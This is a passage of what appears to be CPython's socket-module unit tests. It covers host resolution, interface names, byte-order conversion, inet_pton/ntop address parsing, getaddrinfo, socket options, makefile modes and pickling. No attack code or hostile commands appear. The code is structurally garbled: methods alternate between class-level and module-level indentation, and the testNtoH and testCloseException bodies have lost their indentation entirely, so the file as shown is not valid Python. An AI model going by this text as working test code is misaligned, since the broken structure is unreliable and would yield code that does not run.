        try:
            hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
        except OSError:
            # Probably a similar problem as above; skip this test
            self.skipTest('name lookup failure')
        all_host_names = [hostname, hname] + aliases
        fqhn = socket.getfqdn(ip)
        if not fqhn in all_host_names:
            self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
    def test_host_resolution(self):
        """Numeric IPv4 literals must resolve to themselves."""
        for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
            self.assertEqual(socket.gethostbyname(addr), addr)

        # we don't test support.HOSTv6 because there's a chance it doesn't have
        # a matching name entry (e.g. 'ip6-localhost')
        for host in [support.HOSTv4]:
            self.assertIn(host, socket.gethostbyaddr(host)[2])
    def test_host_resolution_bad_address(self):
        """Malformed IP literals must raise OSError from both resolvers."""
        # These are all malformed IP addresses and expected not to resolve to
        # any result.  But some ISPs, e.g. AWS, may successfully resolve these
        # IPs.
        explanation = (
            "resolving an invalid IP address did not raise OSError; "
            "can be caused by a broken DNS server"
        )
        for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
                     '1:1:1:1:1:1:1:1:1']:
            with self.assertRaises(OSError, msg=addr):
                socket.gethostbyname(addr)
            with self.assertRaises(OSError, msg=explanation):
                socket.gethostbyaddr(addr)
    @unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
    @unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
    def test_sethostname(self):
        """sethostname() round-trips with gethostname(); needs root (EPERM skips)."""
        oldhn = socket.gethostname()
        try:
            socket.sethostname('new')
        except OSError as e:
            if e.errno == errno.EPERM:
                self.skipTest("test should be run as root")
            else:
                raise
        try:
            # running test as root!
            self.assertEqual(socket.gethostname(), 'new')
            # Should work with bytes objects too
            socket.sethostname(b'bar')
            self.assertEqual(socket.gethostname(), 'bar')
        finally:
            # Always restore the machine's original hostname.
            socket.sethostname(oldhn)
    @unittest.skipUnless(hasattr(socket, 'if_nameindex'),
                         'socket.if_nameindex() not available.')
    def testInterfaceNameIndex(self):
        """if_nameindex() entries round-trip through if_nametoindex()/if_indextoname()."""
        interfaces = socket.if_nameindex()
        for index, name in interfaces:
            self.assertIsInstance(index, int)
            self.assertIsInstance(name, str)
            # interface indices are non-zero integers
            self.assertGreater(index, 0)
            _index = socket.if_nametoindex(name)
            self.assertIsInstance(_index, int)
            self.assertEqual(index, _index)
            _name = socket.if_indextoname(index)
            self.assertIsInstance(_name, str)
            self.assertEqual(name, _name)
    @unittest.skipUnless(hasattr(socket, 'if_indextoname'),
                         'socket.if_indextoname() not available.')
    def testInvalidInterfaceIndexToName(self):
        """if_indextoname(): index 0 is OSError, a string index is TypeError."""
        self.assertRaises(OSError, socket.if_indextoname, 0)
        self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
    @unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
                         'socket.if_nametoindex() not available.')
    def testInvalidInterfaceNameToIndex(self):
        """if_nametoindex(): an int name is TypeError, unknown name is OSError."""
        self.assertRaises(TypeError, socket.if_nametoindex, 0)
        self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
    @unittest.skipUnless(hasattr(sys, 'getrefcount'),
                         'test needs sys.getrefcount()')
    def testRefCountGetNameInfo(self):
        """getnameinfo() must not leak a reference on a TypeError path."""
        # Testing reference count for getnameinfo
        try:
            # On some versions, this loses a reference
            orig = sys.getrefcount(__name__)
            socket.getnameinfo(__name__,0)
        except TypeError:
            # The refcount comparison only runs if TypeError was raised.
            if sys.getrefcount(__name__) != orig:
                self.fail("socket.getnameinfo loses a reference")
    def testInterpreterCrash(self):
        """getnameinfo() with a bogus 4-tuple must raise, not crash."""
        # Making sure getnameinfo doesn't crash the interpreter
        try:
            # On some versions, this crashes the interpreter.
            socket.getnameinfo(('x', 0, 0, 0), 0)
        except OSError:
            pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
    @support.cpython_only
    def testNtoHErrors(self):
        """ntoh*/hton* accept in-range values, raise OverflowError out of
        range, and emit DeprecationWarning for 16-bit overflow values."""
        import _testcapi
        s_good_values = [0, 1, 2, 0xffff]
        l_good_values = s_good_values + [0xffffffff]
        l_bad_values = [-1, -2, 1<<32, 1<<1000]
        s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
                                       _testcapi.INT_MAX + 1]
        s_deprecated_values = [1<<16, _testcapi.INT_MAX]
        for k in s_good_values:
            socket.ntohs(k)
            socket.htons(k)
        for k in l_good_values:
            socket.ntohl(k)
            socket.htonl(k)
        for k in s_bad_values:
            self.assertRaises(OverflowError, socket.ntohs, k)
            self.assertRaises(OverflowError, socket.htons, k)
        for k in l_bad_values:
            self.assertRaises(OverflowError, socket.ntohl, k)
            self.assertRaises(OverflowError, socket.htonl, k)
        for k in s_deprecated_values:
            self.assertWarns(DeprecationWarning, socket.ntohs, k)
            self.assertWarns(DeprecationWarning, socket.htons, k)
    def testGetServBy(self):
        """getservbyname()/getservbyport() round-trip for a known service."""
        eq = self.assertEqual
        # Find one service that exists, then check all the related interfaces.
        # I've ordered this by protocols that have both a tcp and udp
        # protocol, at least for modern Linuxes.
        if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
                or sys.platform in ('linux', 'darwin')):
            # avoid the 'echo' service on this platform, as there is an
            # assumption breaking non-standard port/protocol entry
            services = ('daytime', 'qotd', 'domain')
        else:
            services = ('echo', 'daytime', 'domain')
        for service in services:
            try:
                port = socket.getservbyname(service, 'tcp')
                break
            except OSError:
                pass
        else:
            # None of the candidate services resolved at all.
            raise OSError
        # Try same call with optional protocol omitted
        # Issue #26936: Android getservbyname() was broken before API 23.
        if (not hasattr(sys, 'getandroidapilevel') or
                sys.getandroidapilevel() >= 23):
            port2 = socket.getservbyname(service)
            eq(port, port2)
        # Try udp, but don't barf if it doesn't exist
        try:
            udpport = socket.getservbyname(service, 'udp')
        except OSError:
            udpport = None
        else:
            eq(udpport, port)
        # Now make sure the lookup by port returns the same service name
        # Issue #26936: Android getservbyport() is broken.
        if not support.is_android:
            eq(socket.getservbyport(port2), service)
        eq(socket.getservbyport(port, 'tcp'), service)
        if udpport is not None:
            eq(socket.getservbyport(udpport, 'udp'), service)
        # Make sure getservbyport does not accept out of range ports.
        self.assertRaises(OverflowError, socket.getservbyport, -1)
        self.assertRaises(OverflowError, socket.getservbyport, 65536)
    def testDefaultTimeout(self):
        """setdefaulttimeout() propagates to newly created sockets and
        rejects invalid values."""
        # Testing default timeout
        # The default timeout should initially be None
        self.assertEqual(socket.getdefaulttimeout(), None)
        with socket.socket() as s:
            self.assertEqual(s.gettimeout(), None)

        # Set the default timeout to 10, and see if it propagates
        with socket_setdefaulttimeout(10):
            self.assertEqual(socket.getdefaulttimeout(), 10)
            with socket.socket() as sock:
                self.assertEqual(sock.gettimeout(), 10)

            # Reset the default timeout to None, and see if it propagates
            socket.setdefaulttimeout(None)
            self.assertEqual(socket.getdefaulttimeout(), None)
            with socket.socket() as sock:
                self.assertEqual(sock.gettimeout(), None)

        # Check that setting it to an invalid value raises ValueError
        self.assertRaises(ValueError, socket.setdefaulttimeout, -1)

        # Check that setting it to an invalid type raises TypeError
        self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
    @unittest.skipUnless(hasattr(socket, 'inet_aton'),
                         'test needs socket.inet_aton()')
    def testIPv4_inet_aton_fourbytes(self):
        """inet_aton() must always return exactly 4 bytes."""
        # Test that issue1008086 and issue767150 are fixed.
        # It must return 4 bytes.
        self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
        self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
    @unittest.skipUnless(hasattr(socket, 'inet_pton'),
                         'test needs socket.inet_pton()')
    def testIPv4toString(self):
        """inet_aton() and inet_pton(AF_INET) agree on valid literals and
        reject malformed ones."""
        from socket import inet_aton as f, inet_pton, AF_INET
        g = lambda a: inet_pton(AF_INET, a)
        assertInvalid = lambda func,a: self.assertRaises(
            (OSError, ValueError), func, a
        )

        self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
        self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
        self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
        self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
        self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
        # bpo-29972: inet_pton() doesn't fail on AIX
        if not AIX:
            assertInvalid(f, '0.0.0.')
            assertInvalid(f, '300.0.0.0')
            assertInvalid(f, 'a.0.0.0')
            assertInvalid(f, '1.2.3.4.5')
            assertInvalid(f, '::1')

        self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
        self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
        self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
        self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
        assertInvalid(g, '0.0.0.')
        assertInvalid(g, '300.0.0.0')
        assertInvalid(g, 'a.0.0.0')
        assertInvalid(g, '1.2.3.4.5')
        assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
                     'test needs socket.inet_pton()')
def testIPv6toString(self):
    """Check inet_pton(AF_INET6) packing of textual IPv6 addresses,
    including '::' compression, embedded IPv4 tails, and rejection of
    malformed inputs."""
    try:
        from socket import inet_pton, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')

    if sys.platform == "win32":
        try:
            inet_pton(AF_INET6, '::')
        except OSError as e:
            # WSAEINVAL (10022) here means the stack lacks IPv6 support.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')

    f = lambda a: inet_pton(AF_INET6, a)
    # Both OSError and ValueError are accepted as "invalid address".
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )

    self.assertEqual(b'\x00' * 16, f('::'))
    self.assertEqual(b'\x00' * 16, f('0::0'))
    self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
    self.assertEqual(
        b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
        f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
    )
    self.assertEqual(
        b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
        f('ad42:abc::127:0:254:2')
    )
    self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
    assertInvalid('0x20::')
    assertInvalid(':::')
    assertInvalid('::0::')
    assertInvalid('1::abc::')
    assertInvalid('1::abc::def')
    assertInvalid('1:2:3:4:5:6')
    assertInvalid('1:2:3:4:5:6:')
    assertInvalid('1:2:3:4:5:6:7:8:0')
    # bpo-29972: inet_pton() doesn't fail on AIX
    if not AIX:
        assertInvalid('1:2:3:4:5:6:7:8:')

    # Mixed notation: IPv4 dotted-quad embedded in the low 32 bits.
    self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
        f('::254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
        f('42::a29b:254.42.23.64')
    )
    self.assertEqual(
        b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
        f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
    )
    assertInvalid('255.254.253.252')
    assertInvalid('1::260.2.3.0')
    assertInvalid('1::0.be.e.0')
    assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
    assertInvalid('::1.2.3.4:0')
    assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv4(self):
    """Check that inet_ntoa() and inet_ntop(AF_INET) unpack 4-byte
    values into dotted-quad strings, accept bytearray input, and
    reject buffers of the wrong length."""
    from socket import inet_ntoa as f, inet_ntop, AF_INET
    # g unpacks via the generic inet_ntop() entry point for comparison.
    g = lambda a: inet_ntop(AF_INET, a)
    assertInvalid = lambda func,a: self.assertRaises(
        (OSError, ValueError), func, a
    )

    self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
    self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
    # Only exactly 4 bytes is a valid IPv4 packed address.
    assertInvalid(f, b'\x00' * 3)
    assertInvalid(f, b'\x00' * 5)
    assertInvalid(f, b'\x00' * 16)
    self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))

    self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
    self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
    self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
    assertInvalid(g, b'\x00' * 3)
    assertInvalid(g, b'\x00' * 5)
    assertInvalid(g, b'\x00' * 16)
    self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
                     'test needs socket.inet_ntop()')
def testStringToIPv6(self):
    """Check inet_ntop(AF_INET6) formatting of 16-byte packed values,
    including '::' compression, bytearray input, and rejection of
    wrong-length buffers."""
    try:
        from socket import inet_ntop, AF_INET6, has_ipv6
        if not has_ipv6:
            self.skipTest('IPv6 not available')
    except ImportError:
        self.skipTest('could not import needed symbols from socket')

    if sys.platform == "win32":
        try:
            inet_ntop(AF_INET6, b'\x00' * 16)
        except OSError as e:
            # WSAEINVAL (10022) here means the stack lacks IPv6 support.
            if e.winerror == 10022:
                self.skipTest('IPv6 might not be supported')

    f = lambda a: inet_ntop(AF_INET6, a)
    assertInvalid = lambda a: self.assertRaises(
        (OSError, ValueError), f, a
    )

    self.assertEqual('::', f(b'\x00' * 16))
    self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
    self.assertEqual(
        'aef:b01:506:1001:ffff:9997:55:170',
        f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
    )
    self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))

    # Only exactly 16 bytes is a valid IPv6 packed address.
    assertInvalid(b'\x12' * 15)
    assertInvalid(b'\x12' * 17)
    assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...

def testSockName(self):
    """getsockname() on a bound socket must report the bound port and
    either the wildcard address or this host's own address."""
    # Testing getsockname()
    port = support.find_unused_port()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(sock.close)
    sock.bind(("0.0.0.0", port))
    name = sock.getsockname()
    # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
    # it reasonable to get the host's addr in addition to 0.0.0.0.
    # At least for eCos. This is required for the S/390 to pass.
    try:
        my_ip_addr = socket.gethostbyname(socket.gethostname())
    except OSError:
        # Probably name lookup wasn't set up right; skip this test
        self.skipTest('name lookup failure')
    self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
    self.assertEqual(name[1], port)
def testGetSockOpt(self):
    """A freshly created TCP socket must report SO_REUSEADDR as
    disabled (zero) via getsockopt()."""
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(tcp_sock.close)
    reuse_flag = tcp_sock.getsockopt(socket.SOL_SOCKET,
                                     socket.SO_REUSEADDR)
    self.assertFalse(reuse_flag != 0, "initial mode is reuse")
def testSetSockOpt(self):
    """Enabling SO_REUSEADDR via setsockopt() must be observable
    through a subsequent getsockopt() call."""
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(tcp_sock.close)
    tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    reuse_flag = tcp_sock.getsockopt(socket.SOL_SOCKET,
                                     socket.SO_REUSEADDR)
    self.assertFalse(reuse_flag == 0, "failed to set reuse mode")
def testSendAfterClose(self):
    """send() on a closed socket must raise OSError, even with a
    timeout set."""
    # testing send() after close() with timeout
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)
    # The with-block has closed the socket; send() must now fail.
    self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
    """The .family, .type and .proto attributes must reflect the
    values the socket was created with."""
    # testing .family, .type and .protocol
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        self.assertEqual(sock.family, socket.AF_INET)
        if hasattr(socket, 'SOCK_CLOEXEC'):
            # Some platforms fold SOCK_CLOEXEC into the reported type.
            self.assertIn(sock.type,
                          (socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
                           socket.SOCK_STREAM))
        else:
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
    """bind() must reject out-of-range port numbers with
    OverflowError, and accept a valid port."""
    sock = socket.socket()
    self.addCleanup(sock.close)
    port = support.find_unused_port()
    big_port = port + 65536
    neg_port = port - 65536
    self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
    self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
    # Since find_unused_port() is inherently subject to race conditions, we
    # call it a couple times if necessary.
    for i in itertools.count():
        port = support.find_unused_port()
        try:
            sock.bind((HOST, port))
        except OSError as e:
            # Retry on EADDRINUSE, but give up after 5 attempts.
            if e.errno != errno.EADDRINUSE or i == 5:
                raise
        else:
            break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
    """Windows-only: ioctl() and the SIO_*/RCVALL_* constants must be
    present, reject an invalid control code, and accept
    SIO_KEEPALIVE_VALS."""
    self.assertTrue(hasattr(socket.socket, 'ioctl'))
    self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
    self.assertTrue(hasattr(socket, 'RCVALL_ON'))
    self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
    self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
    s = socket.socket()
    self.addCleanup(s.close)
    self.assertRaises(ValueError, s.ioctl, -1, None)
    s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
                     'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
    """Windows-only: ioctl(SIO_LOOPBACK_FAST_PATH) must accept a bool
    and reject None with TypeError.

    Skips when the OS defines the constant but does not implement the
    control code (WSAEOPNOTSUPP).
    """
    s = socket.socket()
    self.addCleanup(s.close)
    try:
        s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
    except OSError as exc:
        WSAEOPNOTSUPP = 10045
        if exc.winerror == WSAEOPNOTSUPP:
            # Fixed wording of the skip message ("doesn't implemented"
            # was ungrammatical).
            self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                          "not implemented in this Windows version")
        raise
    self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
    """Exercise getaddrinfo(): result shape, host/port argument forms,
    family/type/proto/flags filters, keyword arguments, and a couple
    of historical crash regressions."""
    try:
        socket.getaddrinfo('localhost', 80)
    except socket.gaierror as err:
        if err.errno == socket.EAI_SERVICE:
            # see http://bugs.python.org/issue1282647
            self.skipTest("buggy libc version")
        raise
    # len of every sequence is supposed to be == 5
    for info in socket.getaddrinfo(HOST, None):
        self.assertEqual(len(info), 5)
    # host can be a domain name, a string representation of an
    # IPv4/v6 address or None
    socket.getaddrinfo('localhost', 80)
    socket.getaddrinfo('127.0.0.1', 80)
    socket.getaddrinfo(None, 80)
    if support.IPV6_ENABLED:
        socket.getaddrinfo('::1', 80)
    # port can be a string service name such as "http", a numeric
    # port number or None
    # Issue #26936: Android getaddrinfo() was broken before API level 23.
    if (not hasattr(sys, 'getandroidapilevel') or
            sys.getandroidapilevel() >= 23):
        socket.getaddrinfo(HOST, "http")
    socket.getaddrinfo(HOST, 80)
    socket.getaddrinfo(HOST, None)
    # test family and socktype filters
    infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
    for family, type, _, _, _ in infos:
        self.assertEqual(family, socket.AF_INET)
        self.assertEqual(str(family), 'AddressFamily.AF_INET')
        self.assertEqual(type, socket.SOCK_STREAM)
        self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
    infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    for _, socktype, _, _, _ in infos:
        self.assertEqual(socktype, socket.SOCK_STREAM)
    # test proto and flags arguments
    socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    # a server willing to support both IPv4 and IPv6 will
    # usually do this
    socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                       socket.AI_PASSIVE)
    # test keyword arguments
    a = socket.getaddrinfo(HOST, None)
    b = socket.getaddrinfo(host=HOST, port=None)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, socket.AF_INET)
    b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
    b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
    b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
    b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                           socket.AI_PASSIVE)
    b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
                           type=socket.SOCK_STREAM, proto=0,
                           flags=socket.AI_PASSIVE)
    self.assertEqual(a, b)
    # Issue #6697.
    self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
    # Issue 17269: test workaround for OS X platform bug segfault
    if hasattr(socket, 'AI_NUMERICSERV'):
        try:
            # The arguments here are undefined and the call may succeed
            # or fail. All we care here is that it doesn't segfault.
            socket.getaddrinfo("localhost", None, 0, 0, 0,
                               socket.AI_NUMERICSERV)
        except socket.gaierror:
            pass
def test_getnameinfo(self):
    """getnameinfo() must reject hostnames; only IP addresses are
    allowed as input."""
    # only IP addresses are allowed
    self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
                     'network is not enabled')
def test_idna(self):
    """Internationalized (IDNA) domain names must work with
    gethostbyname(), gethostbyname_ex() and getaddrinfo().
    Requires real network access."""
    # Check for internet access before running test
    # (issue #12804, issue #25138).
    with support.transient_internet('python.org'):
        socket.gethostbyname('python.org')

    # these should all be successful
    domain = 'ะธัะฟััะฐะฝะธะต.pythontest.net'
    socket.gethostbyname(domain)
    socket.gethostbyname_ex(domain)
    socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
    # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
    # have a reverse entry yet
    # socket.gethostbyaddr('ะธัะฟััะฐะฝะธะต.python.org')
def check_sendall_interrupted(self, with_timeout):
    """Helper: verify sendall() behavior when interrupted by SIGALRM.

    Without a timeout, an exception raised in the signal handler must
    propagate out of sendall(); with a timeout, an interrupting signal
    must not mask the eventual socket.timeout.
    """
    # socketpair() is not strictly required, but it makes things easier.
    if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
        self.skipTest("signal.alarm and socket.socketpair required for this test")
    # Our signal handlers clobber the C errno by calling a math function
    # with an invalid domain value.
    def ok_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
    def raising_handler(*args):
        self.assertRaises(ValueError, math.acosh, 0)
        1 // 0
    c, s = socket.socketpair()
    old_alarm = signal.signal(signal.SIGALRM, raising_handler)
    try:
        if with_timeout:
            # Just above the one second minimum for signal.alarm
            c.settimeout(1.5)
        with self.assertRaises(ZeroDivisionError):
            signal.alarm(1)
            # Send enough data that sendall() blocks until the alarm fires.
            c.sendall(b"x" * support.SOCK_MAX_SIZE)
        if with_timeout:
            signal.signal(signal.SIGALRM, ok_handler)
            signal.alarm(1)
            self.assertRaises(socket.timeout, c.sendall,
                              b"x" * support.SOCK_MAX_SIZE)
    finally:
        signal.alarm(0)
        signal.signal(signal.SIGALRM, old_alarm)
        c.close()
        s.close()
def test_sendall_interrupted(self):
    """sendall() without a timeout, interrupted by SIGALRM."""
    self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
    """sendall() with a timeout, interrupted by SIGALRM."""
    self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
    """Garbage-collecting an open socket must emit a ResourceWarning
    that mentions the socket's repr; the warning is deferred while a
    makefile() object still references the socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    r = repr(sock)
    with self.assertWarns(ResourceWarning) as cm:
        sock = None
        support.gc_collect()
    self.assertIn(r, str(cm.warning.args[0]))
    # An open socket file object gets dereferenced after the socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    f = sock.makefile('rb')
    r = repr(sock)
    sock = None
    support.gc_collect()
    # Only when the file wrapper goes away does the warning fire.
    with self.assertWarns(ResourceWarning):
        f = None
        support.gc_collect()
def test_name_closed_socketio(self):
    """A closed makefile() object must repr with name=-1."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        fp = sock.makefile("rb")
        fp.close()
        self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
    """After closing a makefile() object, its readable()/writable()/
    seekable() probes must raise ValueError instead of answering."""
    with socket.socket() as sock:
        fp = sock.makefile("rb", buffering=0)
        self.assertTrue(fp.readable())
        self.assertFalse(fp.writable())
        self.assertFalse(fp.seekable())
        fp.close()
        self.assertRaises(ValueError, fp.readable)
        self.assertRaises(ValueError, fp.writable)
        self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
    """socket.close(fd) must close the descriptor (making later
    operations fail), reject None with TypeError, and raise OSError
    for an invalid fd."""
    sock = socket.socket()
    try:
        sock.bind((HOST, 0))
        # Close the underlying fd directly; the socket object is now stale.
        socket.close(sock.fileno())
        with self.assertRaises(OSError):
            sock.listen(1)
    finally:
        with self.assertRaises(OSError):
            # sock.close() fails with EBADF
            sock.close()
    with self.assertRaises(TypeError):
        socket.close(None)
    with self.assertRaises(OSError):
        socket.close(-1)
def test_makefile_mode(self):
    """makefile() must accept every supported mode string and expose
    it unchanged through the file object's .mode attribute."""
    valid_modes = ['r', 'rb', 'rw', 'w', 'wb']
    for mode in valid_modes:
        with self.subTest(mode=mode):
            with socket.socket() as sock:
                with sock.makefile(mode) as fp:
                    self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
    """makefile() must reject unsupported mode strings with a
    ValueError whose message mentions 'invalid mode'."""
    rejected_modes = ['rt', 'x', '+', 'a']
    for mode in rejected_modes:
        with self.subTest(mode=mode):
            with socket.socket() as sock:
                with self.assertRaisesRegex(ValueError, 'invalid mode'):
                    sock.makefile(mode)
def test_pickle(self):
    """Socket objects must refuse pickling at every protocol, while
    the AF_*/SOCK_* enum constants must round-trip through pickle."""
    sock = socket.socket()
    with sock:
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            self.assertRaises(TypeError, pickle.dumps, sock, proto)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        family = pickle.loads(pickle.dumps(socket.AF_INET, proto))
        self.assertEqual(family, socket.AF_INET)
        kind = pickle.loads(pickle.dumps(socket.SOCK_STREAM, proto))
        self.assertEqual(kind, socket.SOCK_STREAM)
def test_listen_backlog(self):
    """listen() must accept a zero or negative backlog, and also no
    argument at all."""
    for backlog in 0, -1:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.bind((HOST, 0))
            srv.listen(backlog)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
    """listen() must raise OverflowError for a backlog that does not
    fit in a C int."""
    # Issue 15989
    import _testcapi
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((HOST, 0))
        self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
